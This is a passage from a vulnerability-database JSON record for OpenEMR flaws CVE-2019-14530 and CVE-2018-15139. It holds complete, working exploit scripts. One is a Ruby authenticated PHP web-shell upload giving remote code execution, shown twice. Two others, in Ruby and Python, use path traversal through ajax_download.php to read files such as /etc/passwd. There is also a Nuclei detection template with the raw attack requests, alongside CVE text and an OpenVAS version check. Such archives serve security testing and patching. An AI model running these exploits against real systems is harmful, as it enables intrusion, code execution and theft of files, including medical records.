"https://packetstormsecurity.com/files/download/163215/openemr5017-traversal.txt"}, {"lastseen": "2021-07-13T16:00:46", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163482", "href": "https://packetstormsecurity.com/files/163482/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Date: 2021-07-05 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml \n# Version: < 5.0.1.4 (it means up to 5.0.1.3) \n# Tested on: OpenEMR Version 5.0.0.8 \n# References: https://www.exploit-db.com/exploits/49998 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'http/form_data' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the shell to be uploaded \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr shell.php admin pass \n#{__FILE__} exploit https://example.org:5000/ shell.php admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef upload(root_url, filepath, http) \nvuln_url = \"#{root_url}/interface/super/manage_site_files.php\" \npn = Pathname.new(filepath) \n \nparams = { \nform_image: { \ncontent_type: 'application/x-php', \nfilename: pn.basename.to_s, \nbody: pn \n}, \nbn_save: 'Save' \n} \n \nres = http.post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless (200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs upload(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163482/openemr5013msf-shell.txt"}], "zdt": [{"lastseen": "2021-12-22T15:29:26", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-07-05T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "1337DAY-ID-36507", "href": "https://0day.today/exploit/description/36507", "sourceData": "# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml\n# Version: < 5.0.2 (it means up to 5.0.1.7)\n# Tested on: OpenEMR Version 5.0.1\n# References: https://www.exploit-db.com/exploits/50037\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Patch: https://github.com/openemr/openemr/pull/2592/files\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the file to be read\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass\n #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef exploit(root_url, filename, http)\n vuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\"\n\n http.get(vuln_url).body.to_s\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts exploit(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36507", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-04T15:55:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-06-21T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-06-21T00:00:00", "id": "1337DAY-ID-36449", "href": "https://0day.today/exploit/description/36449", "sourceData": "# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\n# Version: All versions prior to 5.0.2\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md\n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf\n\n'''\nDescription:\nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.\nAn authenticated attacker can download any file (that is readable by the user www-data)\nfrom server storage. If the requested file is writable for the www-data user and the directory\n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\" \n \n \n ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \n / ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | |\n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| |\n \\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \n \n by Hacker5preme\n \n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\nFilepath = input('[+] Filepath: ')\n\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nif 'error=1&site=' in auth.text:\n print('[-] Authentication failed')\n exit()\nelse:\n print('[+] Authentication successfull: ' + str(auth))\n\n\n'''\nPath Traversal:\n'''\nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path\nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'\nurl_exploit = url_static + url_dynamic + Filepath\nprint('')\nprint('[+] Constructed malicious URL: ')\n\n# Headers:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Exploit:\nprint('')\nprint('[+] Contents of ' + Filepath + ':')\nprint('')\ngetfile = session.get(url_exploit, headers = header)\nprint(getfile.text)\n", "sourceHref": "https://0day.today/exploit/36449", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-20T11:35:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36549", "href": "https://0day.today/exploit/description/36549", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T02:01:06", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T14:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-02-10T15:26:00", "id": "PRION:CVE-2019-14530", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2019-14530", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-03T14:53:24", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T14:15:00", "type": "cve", "title": "CVE-2019-14530", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-02-10T15:26:00", "cpe": [], "id": "CVE-2019-14530", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14530", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "nuclei": [{"lastseen": "2023-12-03T21:48:00", "description": "\n OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-04T16:21:34", "type": "nuclei", "title": "OpenEMR <5.0.2 - Local File Inclusion", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2020-04-04T16:21:34", "id": "NUCLEI:CVE-2019-14530", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2019/CVE-2019-14530.yaml", "sourceData": "id: CVE-2019-14530\n\ninfo:\n name: OpenEMR <5.0.2 - Local File Inclusion\n author: TenBird\n severity: high\n description: |\n OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.\n remediation: |\n Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50037\n - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\n - https://github.com/openemr/openemr/pull/2592\n - https://nvd.nist.gov/vuln/detail/CVE-2019-14530\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2019-14530\n cwe-id: CWE-22\n epss-score: 0.8483\n epss-percentile: 0.98186\n cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: open-emr\n product: openemr\n tags: lfi,authenticated,edb,cve,cve2019,openemr\n\nhttp:\n - raw:\n - |\n POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n - |\n GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - filename=passwd\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e12b764064e9babc0f28695eb6a363723a41ca0dfaceea447746932d1866beed022100bb80247624514a38697f2f4d279edbfa6494b3baccff7d61b67f803aecc45728:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-09-24T14:26:54", "description": "OpenEMR is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-08-06T00:00:00", "type": "openvas", "title": "OpenEMR < 5.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3963", "CVE-2019-3966", "CVE-2019-3968", "CVE-2019-14530", "CVE-2019-3965", "CVE-2019-14529", "CVE-2019-8371", "CVE-2019-3967", "CVE-2019-3964", "CVE-2019-8368"], "modified": "2019-09-24T00:00:00", "id": "OPENVAS:1361412562310142700", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142700", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142700\");\n script_version(\"2019-09-24T06:52:30+0000\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 06:52:30 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-06 09:13:00 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-14529\", \"CVE-2019-14530\", \"CVE-2019-3963\", \"CVE-2019-3964\", \"CVE-2019-3965\",\n \"CVE-2019-3966\", \"CVE-2019-3967\", \"CVE-2019-3968\", \"CVE-2019-8368\", \"CVE-2019-8371\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"OpenEMR < 5.0.2 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_mandatory_keys(\"openemr/installed\");\n\n script_tag(name:\"summary\", value:\"OpenEMR is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"OpenEMR is prone to multiple vulnerabilities:\n\n - SQL injection vulnerability in interface/forms/eye_mag/save.php (CVE-2019-14529)\n\n - Authenticated file download vulnerability (CVE-2019-14530)\n\n - Multiple XSS vulnerabilities (CVE-2019-3963, CVE-2019-3964, CVE-2019-3965, CVE-2019-3966, CVE-2019-8368)\n\n - Directory Traversal and Arbitrary File Download vulnerability (CVE-2019-3967)\n\n - Multiple command injection vulnerabilities (CVE-2019-3968, CVE-2019-8371)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions prior to 5.0.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.0.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/2592\");\n script_xref(name:\"URL\", value:\"https://github.com/Wezery/CVE-2019-14530\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com/security/research/tra-2019-40\");\n script_xref(name:\"URL\", value:\"https://know.bishopfox.com/advisories/openemr-5-0-16-remote-code-execution-cross-site-scripting\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less(version: version, test_version: \"5.0.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.0.2\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}

OpenEMR 5.0.1.7 Path Traversal

Description

Related